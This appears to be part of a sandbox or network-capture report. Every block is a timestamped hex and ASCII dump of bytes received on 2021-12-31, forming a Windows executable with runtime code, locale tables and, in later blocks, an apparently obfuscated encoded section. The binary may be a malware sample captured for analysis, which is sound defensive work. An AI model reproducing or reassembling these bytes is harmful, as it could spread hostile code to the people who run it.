                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1562INData Raw: 6a 00 50 89 45 fc ff 15 bc d0 41 00 8b f0 85 f6 75 47 ff 15 00 d0 41 00 83 f8 57 75 28 8b 75 fc 6a 07 68 30 f4 41 00 56 e8 cb 5e 00 00 83 c4 0c 85 c0 74 11 6a 00 6a 00 56 ff 15 bc d0 41 00 8b f0 85 f6 75 14 83 c8 ff 87 03 83 c7 04 3b 7d 0c 75 8c 33 c0 5f 5e 5b c9 c3 8b c6 87 03 85 c0 74 07 56 ff 15 b4 d0 41 00 8b c6 eb e8 55 8b ec 8b 45 08 56 57 8d 3c 85 50 65 44 00 8b 07 83 ce ff 3b c6 74 2b 85 c0 75 29 ff 75 14 ff 75 10 e8 3f ff ff ff 59 59 85 c0 74 14 ff 75 0c 50 ff 15 b8 d0 41 00 85 c0 74 06 8b c8 87 0f eb 04 87 37 33 c0 5f 5e 5d c3 55 8b ec 56 68 48 f4 41 00 68 40 f4 41 00 68 48 f4 41 00 6a 00 e8 9d ff ff ff 8b f0 83 c4 10 85 f6 74 10 ff 75 08 8b ce ff 15 5c d1 41 00 ff d6 5e 5d c3 5e 5d ff 25 a4 d0 41 00 55 8b ec 56 68 5c f4 41 00 68 54 f4 41 00 68
                                                                                                                                                                                                          Data Ascii: jPEAuGAWu(ujh0AV^tjjVAu;}u3_^[tVAUEVW<PeD;t+u)uu?YYtuPAt73_^]UVhHAh@AhHAjtu\A^]^]%AUVh\AhTAh
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1570INData Raw: ff ff 59 c3 8b ff 55 8b ec 51 53 56 8b f1 57 8b 06 8b 7e 04 8b 18 53 e8 3a 83 00 00 ff 76 04 88 45 fc 8b 06 ff 30 8b 46 10 ff 30 8b 46 0c ff 30 8b 46 08 ff 30 e8 8d 00 00 00 57 53 ff 75 fc 8b f0 e8 bc 83 00 00 83 c4 24 8b c6 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 20 83 7d 0c 00 74 2b 83 7d 10 00 74 25 8b 4d 14 85 c9 75 22 8b 45 18 50 c6 40 1c 01 c7 40 18 16 00 00 00 33 c0 50 50 50 50 50 e8 7c e4 ff ff 83 c4 18 33 c0 c9 c3 8d 45 14 89 4d f8 89 45 e0 8b 45 18 89 45 e4 8d 45 08 89 45 e8 8d 45 0c 89 45 ec 8d 45 10 89 45 f0 8d 45 f8 50 8d 45 e0 89 4d f4 50 8d 45 f4 50 8d 4d ff e8 e4 fe ff ff c9 c3 8b ff 55 8b ec 83 ec 0c 53 56 57 8b 7d 0c 85 ff 74 2c 8b 75 10 85 f6 74 25 8b 4d 14 85 c9 75 25 8b 45 18 50 c6 40 1c 01 c7 40 18 16 00 00 00 33 c0 50 50 50 50 50 e8 00
                                                                                                                                                                                                          Data Ascii: YUQSVW~S:vE0F0F0F0WSu$_^[U }t+}t%Mu"EP@@3PPPPP|3EMEEEEEEEEEEPEMPEPMUSVW}t,ut%Mu%EP@@3PPPPP
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1578INData Raw: db 74 05 66 3b da 75 51 50 56 6a 10 8d 87 00 01 00 00 50 e8 d2 8b 00 00 83 c4 10 85 c0 75 42 8b 45 fc 6a 2c 59 66 3b d9 0f 84 19 ff ff ff 66 85 db 0f 84 10 ff ff ff 8b 75 f8 83 c6 02 40 68 68 00 42 00 56 89 45 fc e8 7b ae 00 00 59 59 6a 2c 5a 85 c0 0f 85 45 ff ff ff 83 c8 ff 5f 5e 5b c9 c3 33 db 53 53 53 53 53 e8 3f c5 ff ff cc 8b ff 55 8b ec 56 e8 f7 21 00 00 8b 55 08 8b f0 6a 00 58 8b 8e 50 03 00 00 f6 c1 02 0f 94 c0 40 83 fa ff 74 33 85 d2 74 36 83 fa 01 74 1f 83 fa 02 74 15 e8 0c e6 ff ff c7 00 16 00 00 00 e8 ce c4 ff ff 83 c8 ff eb 17 83 e1 fd eb 03 83 c9 02 89 8e 50 03 00 00 eb 07 83 0d 70 52 44 00 ff 5e 5d c3 8b ff 55 8b ec 56 8b 75 0c 85 f6 74 1f 8b 45 08 85 c0 74 18 3b c6 74 14 57 6a 2e 59 8b f8 f3 a5 83 60 0c 00 50 e8 74 ae 00 00 59 5f 5e 5d c3
                                                                                                                                                                                                          Data Ascii: tf;uQPVjPuBEj,Yf;fu@hhBVE{YYj,ZE_^[3SSSSS?UV!UjXP@t3t6ttPpRD^]UVutEt;tWj.Y`PtY_^]
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1586INData Raw: e8 42 a6 ff ff 59 83 65 fc 00 6a 00 8b 45 0c 8b 00 ff 30 e8 0d 02 00 00 59 59 c7 45 fc fe ff ff ff e8 12 00 00 00 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c2 0c 00 8b 45 10 ff 30 e8 4d a6 ff ff 59 c3 6a 08 68 e0 9a 42 00 e8 b0 6b ff ff 8b 45 08 ff 30 e8 ed a5 ff ff 59 83 65 fc 00 8b 4d 0c 8b 41 04 8b 00 ff 30 8b 01 ff 30 e8 b3 01 00 00 59 59 c7 45 fc fe ff ff ff e8 12 00 00 00 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c2 0c 00 8b 45 10 ff 30 e8 f3 a5 ff ff 59 c3 8b ff 55 8b ec 83 ec 14 8b 45 08 33 c9 41 6a 43 89 48 18 8b 45 08 c7 00 40 fe 41 00 8b 45 08 89 88 50 03 00 00 8b 45 08 59 6a 05 c7 40 48 50 55 44 00 8b 45 08 66 89 48 6c 8b 45 08 66 89 88 72 01 00 00 8d 4d ff 8b 45 08 83 a0 4c 03 00 00 00 8d 45 08 89 45 f0 58 89 45 f8 89 45 ec 8d 45 f8 50
                                                                                                                                                                                                          Data Ascii: BYejE0YYEMdY_^[E0MYjhBkE0YeMA00YYEMdY_^[E0YUE3AjCHE@AEPEYj@HPUDEfHlEfrMELEEXEEEP
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1594INData Raw: 43 8b c6 8b d6 83 e0 3f c1 fa 06 6b c8 38 8b 04 95 20 69 44 00 f6 44 08 28 01 74 28 8d 45 08 89 75 f8 89 45 ec 8d 4d ff 8b 45 0c 89 45 f0 8d 45 f8 50 8d 45 ec 89 75 f4 50 8d 45 f4 50 e8 f9 fe ff ff eb 28 8b 45 0c 33 c9 50 51 51 51 c6 40 24 01 51 89 48 20 c6 40 1c 01 51 c7 40 18 09 00 00 00 e8 9c 84 ff ff 83 c4 18 83 c8 ff 5e c9 c3 8b ff 55 8b ec 56 57 8b 7d 08 57 e8 a2 61 00 00 59 83 f8 ff 75 04 33 f6 eb 4e a1 20 69 44 00 83 ff 01 75 09 f6 80 98 00 00 00 01 75 0b 83 ff 02 75 1c f6 40 60 01 74 16 6a 02 e8 73 61 00 00 6a 01 8b f0 e8 6a 61 00 00 59 59 3b c6 74 c8 57 e8 5e 61 00 00 59 50 ff 15 00 d1 41 00 85 c0 75 b6 ff 15 00 d0 41 00 8b f0 57 e8 b3 60 00 00 59 8b cf 83 e7 3f c1 f9 06 6b d7 38 8b 0c 8d 20 69 44 00 c6 44 11 28 00 85 f6 74 10 ff 75 0c 56 e8 79
                                                                                                                                                                                                          Data Ascii: C?k8 iDD(t(EuEMEEEPEuPEP(E3PQQQ@$QH @Q@^UVW}WaYu3N iDuuu@`tjsajjaYY;tW^aYPAuAW`Y?k8 iDD(tuVy
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1602INData Raw: c0 74 5c 8b 4d 10 39 4d ec 77 54 03 7d ec 8b 45 f8 8b 55 f0 8b 04 85 20 69 44 00 80 7c 02 28 00 7d ab 80 7d ff 02 74 17 d1 e9 51 ff 75 0c 57 53 ff 75 08 e8 f9 f9 ff ff 83 c4 14 8b f8 eb 8e d1 ef 80 7d e4 00 57 ff 75 e0 ff 75 08 74 0a e8 35 fb ff ff 83 c4 0c eb e3 e8 2c f8 ff ff eb f4 ff 15 00 d0 41 00 6a 05 5f 3b c7 75 17 e8 41 86 ff ff c7 00 09 00 00 00 e8 23 86 ff ff 89 38 e9 47 ff ff ff 83 f8 6d 0f 85 37 ff ff ff 33 ff e9 3a ff ff ff 33 c0 eb 1b e8 03 86 ff ff 83 20 00 e8 0e 86 ff ff c7 00 09 00 00 00 e8 d0 64 ff ff 83 c8 ff 5f 5b c9 c3 6a 18 68 40 9c 42 00 e8 3e 2b ff ff 8b 7d 08 83 ff fe 75 1b 8b 45 18 c6 40 24 01 83 60 20 00 c6 40 1c 01 c7 40 18 09 00 00 00 e9 e0 00 00 00 85 ff 0f 88 b3 00 00 00 3b 3d 20 6b 44 00 0f 83 a7 00 00 00 8b cf c1 e9 06 89
                                                                                                                                                                                                          Data Ascii: t\M9MwT}EU iD|(}}tQuWSu}Wuut5,Aj_;uA#8Gm73:3 d_[jh@B>+}uE@$` @@;= kD
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1610INData Raw: ff ff 40 74 08 c6 85 70 ff ff ff 00 c3 c6 85 70 ff ff ff 00 dc 05 fe 0e 42 00 c3 eb 03 cc cc cc d9 c9 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 00 eb 07 c6 85 70 ff ff ff 00 de c1 c3 8d a4 24 00 00 00 00 90 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 20 d9 c9 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 00 eb 07 c6 85 70 ff ff ff 01 de c1 c3 90 dd d8 dd d8 db 2d e0 0e 42 00 80 bd 70 ff ff ff 00 7f 07 c6 85 70 ff ff ff 01 0a c9 c3 8d 49 00 dd d8 dd d8 db 2d f4 0e 42 00 0a ed 74 02 d9 e0 0a c9 74 08 dd 05 06 0f 42 00 de c9 c3 0a c9 74 02 d9 e0 c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 c4 e0 89 45 e0 8b 45 18 89 45 f0
                                                                                                                                                                                                          Data Ascii: @tppB$$bbi@tpp$bbi@t bbi@tpp-BppI-BttBtUEEE
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1618INData Raw: ec 51 51 53 56 6a 38 6a 40 e8 5f 8d ff ff 8b f0 33 db 89 75 f8 59 59 85 f6 75 04 8b f3 eb 4b 8d 86 00 0e 00 00 3b f0 74 41 57 8d 7e 20 8b f0 53 68 a0 0f 00 00 8d 47 e0 50 e8 53 8b ff ff 83 4f f8 ff 80 67 0d f8 89 1f 8d 7f 38 89 5f cc 8d 47 e0 c7 47 d0 00 00 0a 0a c6 47 d4 0a 89 5f d6 88 5f da 3b c6 75 c9 8b 75 f8 5f 53 e8 eb 84 ff ff 59 8b c6 5e 5b c9 c3 8b ff 55 8b ec 56 8b 75 08 85 f6 74 25 53 8d 9e 00 0e 00 00 57 8b fe 3b f3 74 0e 57 ff 15 48 d0 41 00 83 c7 38 3b fb 75 f2 56 e8 b5 84 ff ff 59 5f 5b 5e 5d c3 6a 10 68 00 9d 42 00 e8 48 eb fe ff 81 7d 08 00 20 00 00 72 21 e8 ec 45 ff ff 6a 09 5e 89 30 e8 af 24 ff ff 8b c6 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 33 f6 89 75 e4 6a 07 e8 59 25 ff ff 59 89 75 fc 8b fe a1 20 6b 44 00 89 7d e0 39 45 08
                                                                                                                                                                                                          Data Ascii: QQSVj8j@_3uYYuK;tAW~ ShGPSOg8_GGG__;uu_SY^[UVut%SW;tWHA8;uVY_[^]jhBH} r!Ej^0$MdY_^[3ujY%Yu kD}9E
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1626INData Raw: 33 c0 eb b1 33 c0 eb a5 33 c0 39 43 60 75 39 39 43 5c 74 34 8d 85 0c ff ff ff 50 ff 73 50 e8 01 c9 ff ff 59 59 85 c0 75 1f 57 33 db 53 56 e8 66 02 00 00 83 c4 0c 85 c0 74 0e 81 0f 00 01 00 00 39 5f 04 75 03 89 77 04 8b 07 c1 e8 02 f7 d0 83 e0 01 eb 05 33 c0 89 07 40 8b 4d fc 5f 5e 33 cd 5b e8 e9 c4 fe ff c9 c2 04 00 8b ff 55 8b ec 81 ec f4 00 00 00 a1 20 50 44 00 33 c5 89 45 fc 53 56 8b 75 08 57 e8 e6 61 ff ff 8b d8 e8 df 61 ff ff 56 8b b8 4c 03 00 00 e8 a2 00 00 00 59 8b 4b 60 8b f0 f7 d9 8d 85 0c ff ff ff 6a 78 1b c9 81 e1 02 f0 ff ff 50 81 c1 01 10 00 00 51 56 ff 15 ec d0 41 00 85 c0 75 05 21 07 40 eb 61 8d 85 0c ff ff ff 50 ff 73 50 e8 48 c8 ff ff 59 59 8b 4b 60 85 c0 75 09 85 c9 75 32 57 6a 01 eb 20 85 c9 75 32 39 4b 5c 74 2d 8d 85 0c ff ff ff 50 ff
                                                                                                                                                                                                          Data Ascii: 3339C`u99C\t4PsPYYuW3SVft9_uw3@M_^3[U PD3ESVuWaaVLYK`jxPQVAu!@aPsPHYYK`uu2Wj u29K\t-P
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1634INData Raw: 06 ff ff c7 00 16 00 00 00 e8 71 e5 fe ff b8 ff ff ff 7f e9 83 00 00 00 56 8b 75 10 85 f6 75 04 33 c0 eb 76 ff 75 14 8d 4d ec e8 96 06 ff ff 8b 45 f0 83 b8 a8 00 00 00 00 75 0f 56 53 57 e8 ee fe ff ff 83 c4 0c 8b c8 eb 3e 0f b7 07 8d 4d f0 51 50 8d 7f 02 e8 8b a8 ff ff 0f b7 c0 8d 4d f0 89 45 fc 0f b7 03 8d 5b 02 51 50 e8 75 a8 ff ff 8b 55 fc 83 c4 10 0f b7 c0 8b ca 2b c8 75 09 85 d2 74 05 83 ee 01 75 c2 80 7d f8 00 74 0a 8b 45 ec 83 a0 50 03 00 00 fd 8b c1 5e 5b 5f c9 c3 8b ff 55 8b ec 83 7d 08 00 75 15 e8 03 06 ff ff c7 00 16 00 00 00 e8 c5 e4 fe ff 83 c8 ff 5d c3 ff 75 08 6a 00 ff 35 2c 6c 44 00 ff 15 20 d0 41 00 5d c3 8b ff 55 8b ec 83 ec 28 a1 20 50 44 00 33 c5 89 45 fc 8b 4d 0c 8b 45 18 53 8b 5d 08 56 8b 75 14 89 4d e0 89 45 e4 57 85 f6 75 05 be 34
                                                                                                                                                                                                          Data Ascii: qVuu3vuMEuVSW>MQPME[QPuU+utu}tEP^[_U}u]uj5,lD A]U( PD3EMES]VuMEWu4
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1642INData Raw: 23 76 e2 ab 7c 66 73 f4 09 69 64 69 f3 d2 6d 56 41 12 1f 21 0c 12 20 0c 01 11 fd 3c ec 3e 1d 6e 36 3c 2d 27 1e 4a 00 fe 3c ea 2b 1d 46 1f ed 23 e3 58 02 78 1b 12 10 1f ef 32 ef 55 b3 11 fd 34 ee 00 fe 4d f8 0f 27 f1 31 d9 0c 03 21 00 fa 32 d2 4a a4 00 fe 45 de db 04 dc 24 1f ef 02 f7 00 fa 0a e6 1f ed 33 ef 66 e1 1b db 1e fd 04 fa 11 f0 1b ed 11 fd 0c c0 00 fe 4d c0 30 c8 05 de 1f ef 0a d5 00 fa 22 da 1f ed 2b c7 66 e1 2b f3 1e fd 04 d2 9f 5d 99 8c 88 ff 81 e9 23 ff 50 80 4f be 87 8b f2 be b0 fc 4e 8c 88 8b 00 5e 5a 70 8d 2d 92 86 fd 58 86 99 88 00 2c f9 7c fd fc 88 98 88 ff e5 13 99 f1 f1 89 98 88 86 eb 36 cf fd fc 90 98 88 ff e5 13 c5 f1 f1 81 98 88 86 eb 36 ab fd fc 98 98 88 ff e5 d3 35 87 8b 86 ef f2 79 99 8c 88 f9 3c b4 a1 f2 30 97 a9 be 96 4c fa 6a
                                                                                                                                                                                                          Data Ascii: #v|fsidimVA! <>n6<-'J<+F#Xx2U4M'1!2JE$3fM0"+f+]#PON^Zp-X,|665y<0Lj
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1650INData Raw: 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 81 00 81 00 81 00 81 00 81 00 81 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 10 00 10 00 10 00 10 00 10 00 10 00 82 00 82 00 82 00 82 00 82 00 82 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 10 00 10 00 10 00 10 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1658INData Raw: 68 00 2d 00 6a 00 61 00 6d 00 61 00 69 00 63 00 61 00 00 00 65 00 6e 00 67 00 6c 00 69 00 73 00 68 00 2d 00 6e 00 7a 00 00 00 00 00 65 00 6e 00 67 00 6c 00 69 00 73 00 68 00 2d 00 73 00 6f 00 75 00 74 00 68 00 20 00 61 00 66 00 72 00 69 00 63 00 61 00 00 00 00 00 65 00 6e 00 67 00 6c 00 69 00 73 00 68 00 2d 00 74 00 72 00 69 00 6e 00 69 00 64 00 61 00 64 00 20 00 79 00 20 00 74 00 6f 00 62 00 61 00 67 00 6f 00 00 00 65 00 6e 00 67 00 6c 00 69 00 73 00 68 00 2d 00 75 00 6b 00 00 00 00 00 65 00 6e 00 67 00 6c 00 69 00 73 00 68 00 2d 00 75 00 73 00 00 00 00 00 65 00 6e 00 67 00 6c 00 69 00 73 00 68 00 2d 00 75 00 73 00 61 00 00 00 66 00 72 00 65 00 6e 00 63 00 68 00 2d 00 62 00 65 00 6c 00 67 00 69 00 61 00 6e 00 00 00 00 00 66 00 72 00 65 00 6e 00 63 00 68
                                                                                                                                                                                                          Data Ascii: h-jamaicaenglish-nzenglish-south africaenglish-trinidad y tobagoenglish-ukenglish-usenglish-usafrench-belgianfrench
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1666INData Raw: 2d 00 69 00 71 00 00 00 61 00 72 00 2d 00 6a 00 6f 00 00 00 61 00 72 00 2d 00 6b 00 77 00 00 00 61 00 72 00 2d 00 6c 00 62 00 00 00 61 00 72 00 2d 00 6c 00 79 00 00 00 61 00 72 00 2d 00 6d 00 61 00 00 00 61 00 72 00 2d 00 6f 00 6d 00 00 00 61 00 72 00 2d 00 71 00 61 00 00 00 61 00 72 00 2d 00 73 00 61 00 00 00 61 00 72 00 2d 00 73 00 79 00 00 00 61 00 72 00 2d 00 74 00 6e 00 00 00 61 00 72 00 2d 00 79 00 65 00 00 00 61 00 7a 00 2d 00 61 00 7a 00 2d 00 63 00 79 00 72 00 6c 00 00 00 00 00 61 00 7a 00 2d 00 61 00 7a 00 2d 00 6c 00 61 00 74 00 6e 00 00 00 00 00 62 00 65 00 2d 00 62 00 79 00 00 00 62 00 67 00 2d 00 62 00 67 00 00 00 62 00 6e 00 2d 00 69 00 6e 00 00 00 62 00 73 00 2d 00 62 00 61 00 2d 00 6c 00 61 00 74 00 6e 00 00 00 00 00 63 00 61 00 2d 00 65
                                                                                                                                                                                                          Data Ascii: -iqar-joar-kwar-lbar-lyar-maar-omar-qaar-saar-syar-tnar-yeaz-az-cyrlaz-az-latnbe-bybg-bgbn-inbs-ba-latnca-e
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1674INData Raw: 00 00 80 11 eb 14 27 bf 85 38 52 dd d8 94 4e bd 00 00 00 3b 19 15 17 bf fe 2a 8b 32 5d d3 17 bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 47 15 f7 3f 00 00 00 c0 45 15 f7 3f 00 00 00 40 44 15 f7 3f 00 00 00 00 43 15 f7 3f 00 00 00 80 41 15 f7 3f 00 00 00 00 40 15 f7 3f 00 00 00 80 3e 15 f7 3f 00 00 00 40 3d 15 f7 3f 00 00 00 c0 3b 15 f7 3f 00 00 00 40 3a 15 f7 3f 00 00 00 c0 38 15 f7 3f 00 00 00 80 37 15 f7 3f 00 00 00 00 36 15 f7 3f 00 00 00 80 34 15 f7 3f 00 00 00 00 33 15 f7 3f 00 00 00 80 31 15 f7 3f 00 00 00 40 30 15 f7 3f 00 00 00 c0 2e 15 f7 3f 00 00 00 40 2d 15 f7 3f 00 00 00 c0 2b 15 f7 3f 00 00 00 80 2a 15 f7 3f 00 00 00 00 29 15 f7 3f 00 00 00 80 27 15 f7 3f 00 00 00 00 26 15 f7 3f 00 00 00 c0 24 15 f7 3f 00 00 00 40 23 15 f7
                                                                                                                                                                                                          Data Ascii: '8RN;*2]@G?E?@D?C?A?@?>?@=?;?@:?8?7?6?4?3?1?@0?.?@-?+?*?)?'?&?$?@#
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1682INData Raw: f1 67 8e 2d 48 cf fe 3f 8c ad 11 b4 f3 93 9c bc 27 5a 61 ee 1b fa fe 3f b0 b6 a4 86 f4 c7 9d 3c 97 ba 6b 37 2b 25 ff 3f 43 8e 0d bf a5 a1 93 3c 40 45 6e 5b 76 50 ff 3f 8a a1 d8 2d e1 d3 99 3c 14 be 9c ad fd 7b ff 3f 09 35 06 d0 12 bb 9d bc d8 90 9e 81 c1 a7 ff 3f 1e 93 a5 f3 53 48 87 3c f1 71 8f 2b c2 d3 ff 3f e7 79 65 96 74 eb 62 3c 43 00 4f 00 4e 00 4f 00 55 00 54 00 24 00 00 00 6c 6f 67 31 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 3f 00 00 00 00 00 00 f0 3f 33 04 00 00 00 00 00 00 33 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 00 ff ff ff ff ff ff 0f 00 ff ff ff ff ff ff 0f 00 00 00 00 00 00 c0 db 3f 00 00 00 00 00 c0 db
                                                                                                                                                                                                          Data Ascii: g-H?'Za?<k7+%?C<@En[vP?-<{?5?SH<q+?yetb<CONOUT$log10??33?
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1690INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 94 c1 41 00 00 00 00 00 9c c1 41 00 22 05 93 19 02 00 00 00 10 96 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff e4 c2 41 00 22 05 93 19 01 00 00 00 44 96 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 cc ff ff ff 00 00 00 00 fe ff ff ff a7 50 40 00 bb 50 40 00 00 00 00 00 fe ff ff ff 00 00 00 00 d8 ff ff ff 00 00 00 00 fe ff ff ff 1b 53 40 00 2e 53 40 00 00 00 00 00 fe ff ff ff 00 00 00 00 d8 ff ff ff 00 00 00 00 fe ff ff ff fd 5c 40 00 0b 5d 40 00 00 00 00 00 fe ff ff ff 00 00 00 00 d0 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 9a 88 40 00 00 00 00 00 51 88 40 00 5b 88 40 00 fe ff ff ff 00 00 00
                                                                                                                                                                                                          Data Ascii: AA"BA"DBP@P@S@.S@\@]@@Q@[@
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1698INData Raw: ad 6f 79 67 42 53 00 72 5e 41 73 64 74 72 64 66 4b 77 79 75 ae 71 65 33 31 37 5f 72 77 6c 73 65 6c 75 72 64 6d 65 6d 72 69 79 67 41 50 01 72 54 48 72 65 74 71 64 66 72 78 79 75 64 6a 55 30 35 7a 5f 72 74 6a 73 65 72 0b 6c 65 6d 6f 67 70 79 16 40 41 53 0a 6d 22 72 55 67 63 1d 43 66 72 7d 66 44 56 6a 66 5c 79 36 5f 78 62 6f 1c 28 63 75 78 4d 23 65 6d 78 6d 51 79 41 53 06 78 7f 4f 71 73 60 5a 42 66 72 71 16 4b 65 71 6f 39 eb 35 79 ac 74 6a 59 64 73 75 72 65 6d 63 6d 33 28 79 64 4e 53 00 73 4f 71 76 65 59 73 64 66 75 77 79 64 1b 6f 65 33 3f 3c 21 6c 74 6c 79 6e 61 62 ff 32 6d 65 6c 57 79 0b 48 42 53 70 d0 43 2e 3c 65 74 78 68 6e 7a f9 10 62 3c 59 62 33 35 1d 77 7a 74 6c 58 69 75 78 7b 48 54 17 42 71 6f 09 6f 69 01 00 72 5e 5e 78 e8 2d 72 64 67 57 a7 db 75 65
                                                                                                                                                                                                          Data Ascii: oygBSr^AsdtrdfKwyuqe317_rwlselurdmemriygAPrTHretqdfrxyudjU05z_rtjserlemogpy@ASm"rUgcCfr}fDVjf\y6_xbo(cuxM#emxmQyASxOqs`ZBfrqKeqo95ytjYdsuremcm3(ydNSsOqveYsdfuwydoe3?<!ltlynab2melWyHBSpC.<etxhnzb<Yb35wztlXiux{HTBqooir^^x-rdgWue
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1706INData Raw: 76 67 41 52 1b 42 57 41 11 65 74 72 44 66 72 66 66 69 4d 24 65 33 3f 44 28 78 74 1c 5b 59 63 75 78 6f 6b 4d c7 72 6f 73 4b 77 55 73 15 54 41 79 4d df 72 64 6c 5a 32 79 75 6f 7a 77 32 2a cb 77 34 74 6c 79 4d cf 75 72 6f 41 74 6b 5a c2 79 67 4b 55 28 dc 54 41 79 43 62 7e ba 72 65 7b a7 65 63 59 cb 33 35 3c 79 64 78 b2 76 43 bd 75 64 4f 65 4f 6d 72 6e 69 67 41 53 00 72 54 1a 28 65 77 78 64 66 73 6c 49 71 65 42 65 33 35 29 5f 72 65 44 f7 65 63 73 78 73 66 4e 7a 74 68 e3 6b 49 51 03 76 3b c0 73 65 72 ac 60 1c 54 a9 79 72 72 29 6e 34 33 b8 36 40 97 7b 7e bb 65 0f 54 73 60 bb 6d 7b 45 79 66 75 53 00 72 54 4f 73 6e 6d 72 65 45 72 77 78 75 65 7f 65 38 2f 36 5c 7d 74 6c 72 65 63 75 72 4e 46 65 6c 51 6f 79 66 41 53 00 72 7f 6d 73 60 7b 72 64 67 cc 73 51 da 65 71 6f
                                                                                                                                                                                                          Data Ascii: vgARBWAetrDfrffiM$e3?D(xt[YcuxokMrosKwUsTAyMrdlZ2yuozw2*w4tlyMuroAtkZygKU(TAyCb~re{ecY35<ydxvCudOeOmrnigASrT(ewxdfslIqeBe35)_reDecsxsfNzthkIQv;ser`Tyrr)n436@{~eTs`m{EyfuSrTOsnmreErwxuee8/6\}tlrecurNFelQoyfASrms`{rdgsQeqo
                                                                                                                                                                                                          2021-12-31 18:23:33 UTC1714INData Raw: 5f 51 7b 7e 54 41 77 4f 56 70 67 1b 7e 77 79 71 4f 71 65 33 2e 06 58 72 cf 6c 73 65 4c 75 72 74 72 6a e0 2b 6f 79 66 64 83 e3 72 54 45 5b 5f 74 72 6e 15 49 77 79 7f 6f 75 0a 10 35 36 55 79 0a 72 73 65 69 79 75 0a 05 65 6d 78 74 f4 3e 41 53 01 57 84 fc 73 65 70 5a 5e 66 72 7d 0a 4e 65 71 6f 1b 75 36 5f 78 58 42 74 0a 47 75 72 6f 7a e8 3a 72 6f 78 42 57 48 8d 2b 54 41 72 40 a4 cf 64 66 76 5f 43 75 65 7b 16 08 35 36 55 d0 63 03 3c 65 63 7f 65 ff 61 7b e0 2b 6f 79 66 64 83 a5 72 54 45 5b 5f 74 72 6e 15 49 77 79 7f 66 1e 41 32 35 30 57 5a 4b 6c 73 6f 4e 78 00 4a 6e 65 1d 7a 47 52 67 41 59 2b 77 26 1e 79 65 04 5a 06 66 72 7d 74 ab 60 57 bb 33 33 1c 56 58 74 6d 63 65 63 75 72 7d 6d f9 d9 72 6c 73 67 41 52 1b 42 52 41 0f 67 74 72 54 66 72 66 0a ac 65 71 6f 39 22
                                                                                                                                                                                                          Data Ascii: _Q{~TAwOVpg~wyqOqe3.XrlseLurtrj+oyfdrTE[_trnIwyou56Uyrseiyuemxt>ASWsepZ^fr}Neqou6_xXBtGuroz:roxBWH+TAr@dfv_Cue{56Uc<ecea{+oyfdrTE[_trnIwyfA250WZKlsoNxJnezGRgAY+w&yeZfr}t`W33VXtmcecur}mrlsgARBRAgtrTfrfeqo9"
